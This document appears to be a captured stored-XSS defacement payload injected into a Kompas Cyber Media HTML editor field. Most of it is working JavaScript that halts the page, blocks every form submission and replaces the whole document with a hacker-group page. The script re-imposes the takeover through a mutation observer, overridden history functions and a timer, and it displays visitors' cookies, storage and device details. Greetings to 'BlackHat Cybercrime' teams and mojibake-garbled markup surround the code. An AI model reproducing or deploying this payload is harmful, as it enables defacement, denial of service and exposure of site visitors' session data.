Kompas Cyber Media

HTML Editor - Input script here :
\n
πŸ”’ FORM DIKUNCI PERMANEN OLEH XSS
\n\n
\n
πŸ” SESSION DATA
\n
Domain-
\n
Full URL-
\n
Path-
\n
Protocol-
\n
Port-
\n
Referrer-
\n
\n
πŸ–₯️ BROWSER & SYSTEM
\n
User Agent-
\n
Platform-
\n
Vendor-
\n
Language-
\n
Cookies-
\n
DNT-
\n
Hardware-
\n
\n
πŸ“Ί DISPLAY
\n
Resolution-
\n
Color Depth-
\n
Pixel Ratio-
\n
Viewport-
\n
Orientation-
\n
Touch-
\n
\n
πŸ’Ύ STORAGE
\n
Cookies-
\n
Cookie Count-
\n
LocalStorage-
\n
SessionStorage-
\n
\n
⚑ PERFORMANCE
\n
Page Load-
\n
Resources-
\n
Memory-
\n
\n
\n
πŸ“‘ NETWORK
\n
Status-
\n
Connection-
\n
Downlink-
\n
RTT-
\n
Data Saver-
\n
\n
\n
\n
πŸ“Ÿ EVENT CONSOLE1 event
\n
\n
[00:00:00] βœ“ System initialized
\n
\n
\n
\n\n\n
\n
\nThanks My Friends:
\nKuncen Haxor - Mr.Venom - Pyscodes - SonySec07 - BentoSec21
\nRio./sec - Mr.Vxdx1 - Mr.Bl4ckJAck - AmirXploit - ZynX
\nDPCβ€’Crazy - Inzz - Mr.kribo

\nGreatz:
\nMukoMuko Cyber Team - Bandung Cyber Team
\nJakarta BlackHat Cybercrime - Palembang BlackHat Cybercrime
\nFrom Lammer To Mastah - Jakarta Xploiter\n
\n
~ XSS Permanent Takeover β€’ β€’ Localhost Only ~
\n\n
πŸ”’ PERMANENT
\n\n'; // ============================================ // 2. TIMER DAN FUNGSI DASAR // ============================================ var startTime = Date.now(); var keyCount = 0; var clickCount = 0; var conn = navigator.connection || navigator.mozConnection || navigator.webkitConnection || null; function pad(n, len) { len = len || 2; var s = String(n); while (s.length < len) s = '0' + s; return s; } function ts() { var d = new Date(); return '[' + pad(d.getHours()) + ':' + pad(d.getMinutes()) + ':' + pad(d.getSeconds()) + ']'; } function setText(id, text) { var el = document.getElementById(id); if (el) el.textContent = text; } function setHTML(id, html) { var el = document.getElementById(id); if (el) el.innerHTML = html; } function log(msg, type) { type = type || 'i'; var body = document.getElementById('console-body'); if (!body) return; var line = document.createElement('div'); line.className = 'log-line'; line.innerHTML = '' + ts() + ' ' + msg + ''; body.appendChild(line); body.scrollTop = body.scrollHeight; if (body.children.length > 80) body.removeChild(body.firstChild); } function pageSize() { var bytes = document.documentElement.outerHTML.length; var kb = (bytes / 1024).toFixed(1); setHTML('size', 'πŸ“¦ Page Size : ' + kb + ' kb'); return kb; } function updateAll() { var d = new Date(); setHTML('clock', pad(d.getHours()) + ':' + pad(d.getMinutes()) + ':' + pad(d.getSeconds()) + '.' + pad(d.getMilliseconds(), 2) + ''); setText('date-display', d.toLocaleDateString('id-ID', { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' })); pageSize(); setHTML('s-online', navigator.onLine ? ' ONLINE' : ' OFFLINE'); setText('s-domain', document.domain || 'dummy.kompas.com'); setText('s-conn', conn ? (conn.effectiveType || 'N/A') : 'N/A'); setText('s-uptime', pad(Math.floor((Date.now() - startTime) / 60000)) + ':' + pad(Math.floor(((Date.now() - startTime) % 60000) / 1000))); setText('s-keys', keyCount); setText('s-clicks', clickCount); setText('i-domain', document.domain || 'dummy.kompas.com'); setText('i-url', window.location.href); setText('i-path', window.location.pathname || '/'); setText('i-proto', window.location.protocol); setText('i-port', window.location.port || '443'); setText('i-ref', document.referrer || '(none)'); setText('i-ua', navigator.userAgent); setText('i-platform', navigator.platform || 'Unknown'); setText('i-vendor', navigator.vendor || 'Unknown'); setText('i-lang', navigator.language || 'Unknown'); setText('i-cookie-enabled', navigator.cookieEnabled ? 'βœ… Yes' : '❌ No'); setText('i-dnt', navigator.doNotTrack || 'unspecified'); setText('i-hardware', (navigator.hardwareConcurrency || '?') + ' cores, ' + (navigator.deviceMemory || '?') + ' GB RAM'); setText('i-resolution', screen.width + ' Γ— ' + screen.height); setText('i-color', screen.colorDepth + '-bit'); setText('i-pixel', (window.devicePixelRatio || 1).toFixed(2)); setText('i-viewport', window.innerWidth + ' Γ— ' + window.innerHeight); setText('i-orientation', screen.orientation ? screen.orientation.type : 'N/A'); setText('i-touch', ('ontouchstart' in window || navigator.maxTouchPoints > 0) ? 'βœ… Yes' : '❌ No'); var ck = document.cookie || '(empty)'; setText('i-cookies', ck.length > 50 ? ck.substring(0, 47) + '...' : ck); setText('i-cookie-count', document.cookie ? document.cookie.split(';').filter(function(c) { return c.trim(); }).length : 0); setText('i-ls', localStorage.length + ' items'); setText('i-ss', sessionStorage.length + ' items'); try { if (window.performance && performance.timing) { var lt = performance.timing.loadEventEnd - performance.timing.navigationStart; setText('i-load', (lt > 0 ? lt : '...') + ' ms'); } if (window.performance && performance.getEntriesByType) { setText('i-resources', performance.getEntriesByType('resource').length + ' resources'); } if (window.performance && performance.memory) { var used = (performance.memory.usedJSHeapSize / 1048576).toFixed(1); var limit = (performance.memory.jsHeapSizeLimit / 1048576).toFixed(1); setText('i-mem-label', used + ' / ' + limit + ' MB'); var pct = (performance.memory.usedJSHeapSize / performance.memory.jsHeapSizeLimit) * 100; var bar = document.getElementById('i-mem-bar'); if (bar) { bar.style.width = Math.min(pct, 100) + '%'; bar.className = pct > 80 ? 'pf d' : pct > 50 ? 'pf w' : 'pf'; } } } catch(e) {} setText('i-online', navigator.onLine ? '🟒 Connected' : 'πŸ”΄ Disconnected'); if (conn) { setText('i-conn', conn.effectiveType || 'N/A'); setText('i-downlink', (conn.downlink || 'N/A') + ' Mbps'); setText('i-rtt', (conn.rtt || 'N/A') + ' ms'); setText('i-saver', conn.saveData ? 'βœ… ON' : '❌ OFF'); } } // ============================================ // 3. HANCURKAN HALAMAN LAMA & BANGUN BARU // ============================================ // Hentikan loading try { if (window.stop) window.stop(); } catch(e) {} // Hapus ruler try { if (typeof $ !== 'undefined' && $.fn && $.fn.ruler) { $('#media_script').ruler('destroy'); delete $.fn.ruler; } } catch(e) {} // Blokir form try { HTMLFormElement.prototype.submit = function() { return false; }; } catch(e) {} document.addEventListener('submit', function(e) { e.preventDefault(); e.stopPropagation(); return false; }, true); // TIMPA HALAMAN - PAKSA TANPA BLANK document.documentElement.innerHTML = NEW_PAGE; // ============================================ // 4. INISIALISASI // ============================================ setText('footer-info', new Date().toLocaleDateString('id-ID', { year: 'numeric', month: 'long', day: 'numeric' })); updateAll(); log('βœ“ Takeover sukses', 'i'); log('βœ“ Form dikunci permanen', 'w'); // ============================================ // 5. UPDATE LOOP // ============================================ setInterval(function() { updateAll(); }, 500); // ============================================ // 6. PERLINDUNGAN PERMANEN // ============================================ // Observer - jika halaman berubah, timpa lagi var observer = new MutationObserver(function() { var badge = document.querySelector('.pb'); if (!badge) { document.documentElement.innerHTML = NEW_PAGE; setText('footer-info', new Date().toLocaleDateString('id-ID', { year: 'numeric', month: 'long', day: 'numeric' })); updateAll(); } }); try { observer.observe(document.documentElement, { childList: true, subtree: true }); } catch(e) {} // Override history try { history.pushState = function() { return undefined; }; history.replaceState = function() { return undefined; }; } catch(e) {} // Popstate handler window.addEventListener('popstate', function() { document.documentElement.innerHTML = NEW_PAGE; setText('footer-info', new Date().toLocaleDateString('id-ID', { year: 'numeric', month: 'long', day: 'numeric' })); updateAll(); }); // Event listeners window.addEventListener('online', function() { updateAll(); }); window.addEventListener('offline', function() { updateAll(); }); document.addEventListener('keydown', function() { keyCount++; setText('s-keys', keyCount); }); document.addEventListener('click', function() { clickCount++; setText('s-clicks', clickCount); }); // Periodic check setiap 2 detik setInterval(function() { var check = document.querySelector('.pb'); if (!check) { document.documentElement.innerHTML = NEW_PAGE; setText('footer-info', new Date().toLocaleDateString('id-ID', { year: 'numeric', month: 'long', day: 'numeric' })); updateAll(); } }, 2000); console.log('%cπŸ”’ XSS PERMANEN AKTIF %c| Kalimalang Blackhat Team & Bandung Cyber Team', 'color:red;font-size:20px;font-weight:bold;', 'color:cyan;'); })();


">